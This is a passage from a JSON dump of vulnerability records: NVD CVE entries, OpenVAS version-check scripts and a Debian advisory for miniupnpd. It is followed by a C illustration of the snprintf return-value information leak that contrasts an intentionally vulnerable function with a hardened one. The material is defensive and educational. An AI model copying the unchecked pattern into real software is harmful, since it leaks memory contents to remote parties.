The regression was introduced in https://issues.apache.org/jira/browse/CASSANDRA-12109. The fix for the regression is implemented in https://issues.apache.org/jira/browse/CASSANDRA-14173. This fix is contained in the 3.11.2 release of Apache Cassandra.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-28T16:29:00", "title": "CVE-2018-8016", "type": "cve", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8016"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:apache:cassandra:3.11.1"], "id": "CVE-2018-8016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:cassandra:3.11.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:20:11", "description": "An issue was discovered in Free Lossless Image Format (FLIF) 0.3. 
The TransformPaletteC<FileIO>::process function in transform/palette_C.hpp allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted PAM image file.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-11T13:29:00", "title": "CVE-2018-12109", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12109"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:flif:flif:0.3"], "id": "CVE-2018-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12109", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:flif:flif:0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:33", "description": "An exploitable integer overflow vulnerability exists in the xls_preparseWorkSheet function of libxls 1.4 when handling a MULRK record. A specially crafted XLS file can cause a memory corruption resulting in remote code execution. 
An attacker can send malicious XLS file to trigger this vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-24T19:29:00", "title": "CVE-2017-12109", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12109"], "modified": "2018-05-25T14:32:00", "cpe": ["cpe:/a:libxls_project:libxls:1.4"], "id": "CVE-2017-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12109", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:libxls_project:libxls:1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-01-29T19:29:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2017-1000494", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-06-01T00:00:00", "id": "OPENVAS:1361412562310891811", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891811", "type": "openvas", "title": "Debian LTS: Security Advisory for miniupnpd (DLA-1811-1)", "sourceData": "# 
Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891811\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-1000494\", \"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\", \"CVE-2019-12111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-01 09:22:39 +0000 (Sat, 01 Jun 2019)\");\n script_name(\"Debian LTS: Security Advisory for miniupnpd (DLA-1811-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", 
value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00045.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1811-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'miniupnpd'\n package(s) announced via the DLA-1811-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Ben Barnea and colleagues from VDOO discovered several vulnerabilities in\nminiupnpd, a small daemon that provides UPnP Internet Gateway Device and\nPort Mapping Protocol services.\nThe issues are basically information leak, null pointer dereferences and\nuses after free.\");\n\n script_tag(name:\"affected\", value:\"'miniupnpd' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"miniupnpd\", ver:\"1.8.20140523-4+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12106", "CVE-2019-12111", "CVE-2019-12109"], "description": "MiniUPnP is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310142455", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142455", 
"type": "openvas", "title": "MiniUPnP <= 2.1 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:miniupnp_project:miniupnpd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142455\");\n script_version(\"2019-05-22T09:11:13+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 09:11:13 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-22 09:00:07 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_cve_id(\"CVE-2019-12106\", \"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\",\n \"CVE-2019-12111\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"MiniUPnP <= 2.1 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_miniupnp_detect_tcp.nasl\");\n script_mandatory_keys(\"miniupnp/installed\");\n\n 
script_tag(name:\"summary\", value:\"MiniUPnP is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MiniUPnP is prone to multiple vulnerabilities:\n\n - Use after free vulnerability (CVE-2019-12106)\n\n - Information disclosure vulnerability (CVE-2019-12107)\n\n - Multiple DoS vulnerabilities due to NULL pointer dereferences (CVE-2019-12108, CVE-2019-12109, CVE-2019-12110,\n CVE-2019-12111)\");\n\n script_tag(name:\"affected\", value:\"MiniUPnP version 2.1 and prior.\");\n\n script_tag(name:\"solution\", value:\"Apply the provided patches.\");\n\n script_xref(name:\"URL\", value:\"https://www.vdoo.com/blog/security-issues-discovered-in-miniupnp\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/cd506a67e174a45c6a202eff182a712955ed6d6f\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/bec6ccec63cadc95655721bc0e1dd49dac759d94\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/13585f15c7f7dc28bbbba1661efb280d530d114c\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/86030db849260dd8fb2ed975b9890aef1b62b692\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/f321c2066b96d18afa5158dfa2d2873a2957ef38\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/cb8a02af7a5677cf608e86d57ab04241cf34e24f\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_proto(cpe: CPE, port: port))\n exit(0);\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif (version_is_less_equal(version: version, test_version: \"2.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"Apply Patch\");\n security_message(port: 
port, data: report, proto: proto);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:58:22", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12107", "CVE-2017-1000494", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "description": "Package : miniupnpd\nVersion : 1.8.20140523-4+deb8u1\nCVE ID : CVE-2017-1000494 CVE-2019-12107 CVE-2019-12108\n CVE-2019-12109 CVE-2019-12110 CVE-2019-12111\n\n\nBen Barnea and colleagues from VDOO discovered several vulnerabilities in \nminiupnpd, a small daemon that provides UPnP Internet Gateway Device and \nPort Mapping Protocol services.\nThe issues are basically information leak, null pointer dereferences and \nuses after free.\n\n\n\nFor Debian 8 \"Jessie\", these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n", "edition": 7, "modified": "2019-05-30T17:20:29", "published": "2019-05-30T17:20:29", "id": "DEBIAN:DLA-1811-1:B8BB8", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201905/msg00045.html", "title": "[SECURITY] [DLA 1811-1] miniupnpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
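The scanner entries above only compare package or banner versions (qod_type "package" and "remote_banner_unreliable"); none of them observes the bug itself. The information-leak entry, CVE-2019-12107, is publicly described as improper validation of an snprintf return value in the event-notification code. The C program below is an added, constructed illustration of that bug class and its fix; it is not MiniUPnPd, Greenbone or Debian code. The message template, the 64-byte body buffer, and the attacker-chosen subscription IDs are assumptions made for the example.

```c
/*
 * Constructed illustration (not MiniUPnPd source) of the snprintf
 * return-value pitfall behind the information-leak class: snprintf()
 * returns the length the formatted string WOULD have had, not the number
 * of bytes actually stored. Code that truncates into a fixed buffer and
 * then sends "return value" bytes over-reads the buffer and leaks whatever
 * sits after it in memory.
 */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BODY_SIZE 64   /* fixed-size notification body buffer (assumed) */

/* Hypothetical GENA-style property set; the template is an assumption for
 * the example, not the daemon's real message. */
#define TEMPLATE "<e:propertyset><SID>%s</SID></e:propertyset>"

/* Vulnerable pattern: returns the snprintf result as the send length.
 * On truncation this exceeds bufsize, so a caller doing
 * send(fd, buf, len, 0) reads past the end of the buffer. */
size_t prepare_body_unchecked(char *buf, size_t bufsize, const char *sid)
{
    int n = snprintf(buf, bufsize, TEMPLATE, sid);
    if (n < 0)
        return 0;
    return (size_t)n;   /* BUG: n may be >= bufsize */
}

/* Hardened pattern: a result >= bufsize means the output was truncated;
 * refuse to produce a body rather than hand the caller a length that
 * covers memory snprintf never wrote. */
size_t prepare_body_checked(char *buf, size_t bufsize, const char *sid)
{
    int n = snprintf(buf, bufsize, TEMPLATE, sid);
    if (n < 0 || (size_t)n >= bufsize) {
        if (bufsize > 0)
            buf[0] = '\0';
        return 0;       /* caller treats 0 as "nothing to send" */
    }
    return (size_t)n;
}

/* Build a constructed SID of sid_len 'A' characters (attacker-controlled). */
static void make_sid(char *sid, size_t cap, size_t sid_len)
{
    if (sid_len >= cap)
        sid_len = cap - 1;
    memset(sid, 'A', sid_len);
    sid[sid_len] = '\0';
}

/* How many bytes past the buffer would the unchecked version expose for a
 * subscription ID of the given length? (0 means no over-read.) */
size_t overread_for_sid_length(size_t sid_len)
{
    char sid[256];
    char buf[BODY_SIZE];
    size_t len;

    make_sid(sid, sizeof sid, sid_len);
    len = prepare_body_unchecked(buf, sizeof buf, sid);
    return len > sizeof buf ? len - sizeof buf : 0;
}

/* Same input through the checked version: 1 if it correctly refuses to
 * emit a body, 0 if it hands back a usable length. */
int checked_refuses_for_sid_length(size_t sid_len)
{
    char sid[256];
    char buf[BODY_SIZE];

    make_sid(sid, sizeof sid, sid_len);
    return prepare_body_checked(buf, sizeof buf, sid) == 0;
}

int main(void)
{
    size_t lens[] = { 6, 21, 22, 100 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("sid len %3zu: unchecked over-reads %3zu bytes, checked refuses: %d\n",
               lens[i], overread_for_sid_length(lens[i]),
               checked_refuses_for_sid_length(lens[i]));
    return 0;
}
```

The fixed part of the template is 42 bytes, so a 22-character SID produces exactly 64 bytes: snprintf truncates (63 characters plus the terminator) and returns 64, which the unchecked code accepts without over-reading, while the checked version already rejects it because n >= bufsize. A 100-character SID makes the unchecked version hand 78 bytes beyond the buffer to the caller.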